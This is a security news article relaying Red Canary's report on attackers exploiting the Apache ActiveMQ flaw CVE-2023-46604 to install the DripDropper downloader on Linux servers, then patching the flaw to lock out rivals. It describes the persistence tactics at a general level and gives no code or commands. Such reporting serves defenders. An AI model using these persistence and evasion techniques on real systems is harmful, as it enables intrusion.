Hackers deploy DripDropper via Apache ActiveMQ flaw, patch systems to evade detection
Hackers exploit Apache ActiveMQ flaw to install DripDropper on Linux, then patch it to block rivals and hide their tracks.
Red Canary researchers observed attackers exploit a 2-year-old Apache ActiveMQ vulnerability, tracked as CVE-2023-46604 (CVSS score of 10.0), to gain persistence on cloud Linux systems and deploy DripDropper malware. Uniquely, they patch the flaw post-exploit to block rivals and evade detection.
“It may seem counterintuitive for an adversary to “fix” a compromised system after gaining remote access but in many scenarios the motivation can be twofold.” reads the report published by Red Canary. “It’s a great way to potentially lock out other adversaries, ensuring their foothold remains exclusive. It can also obscure the adversary’s initial access technique.”
Apache ActiveMQis an open-source message broker software that serves as a message-oriented middleware (MOM) platform. It is developed by the Apache Software Foundation and written in Java. ActiveMQ provides messaging and communication capabilities to various applications, making it easier for them to exchange data and communicate asynchronously.
Once compromised a target system, attackers used tools like Sliver and Cloudflare Tunnels to maintain long-term access. In one case, they altered SSH settings to allow root logins, giving them full control. They then deployed a new malware downloader dubbed DripDropper, adding another layer of persistence. Previously, the same flaw was abused to spread ransomware and cryptominers.
DripDropper is a stealthy Linux malware packaged as an encrypted PyInstaller ELF that requires a password to run, making analysis harder. It connects to a Dropbox account via a hardcoded token and drops two malicious files. The first varies in behavior, such as process monitoring or fetching more commands, and persists by altering cron jobs. The second, with a random name, also contacts Dropbox and often tampers with SSH configs, enabling persistent access through accounts like games. Exact data exchanged remains unknown.
“Finally, the adversary usedcurlto download two ActiveMQ JAR files fromrepo1[.]maven[.]org, a domain belonging to Apache Maven. These two JAR files constitute a legitimate patch for CVE-2023-46604. By deleting the existing JAR files and replacing them, the adversary effectively patched the already compromised system.” continues the report. “We assess the adversary likely did this to reduce detection via common methods, such as vulnerability scanners, and to effectively reduce the likelihood of being spotted by defenders due to another adversary being detected when attempting to exploit the vulnerability.”
Threat actors employedthis technique while attempting to exploit other CVEs. The researchers pointed out that patching the vulnerability does not disrupt their operations, as they have already established other persistence mechanisms to maintain persistentaccess.
Red Canary states attackers still exploit a 3-year-old ActiveMQ flaw to deploy Godzilla Webshell and Ransomhub ransomware, with a 94% EPSS risk.
“Securing cloud and *NIX-based environments demand a multi-layered approach.” concludes the report.
In January 2024, Trustwave researchers observed a surge in attacks exploiting the same flaw, in many cases aimed at delivering a malicious code that borrows the code from the open-source web shellGodzilla.
Threat actors conceal the web shell within an unknown binary format evading security and signature-based scanners. Once deployed, the ActiveMQ’s JSP engine compiles and executes the web shell.
In November 2023, researchers at Rapid7reportedthe suspected exploitation of the recently disclosed critical vulnerabilityCVE-2023-46604in the Apache ActiveMQ.
Rapid7 identified exploitation attempts of the CVE-2023-46604 flaw to deployHelloKitty ransomwarein two different customer environments.
Follow me on Twitter:@securityaffairsandFacebookandMastodon
(SecurityAffairs–hacking,Apache ActiveMQ)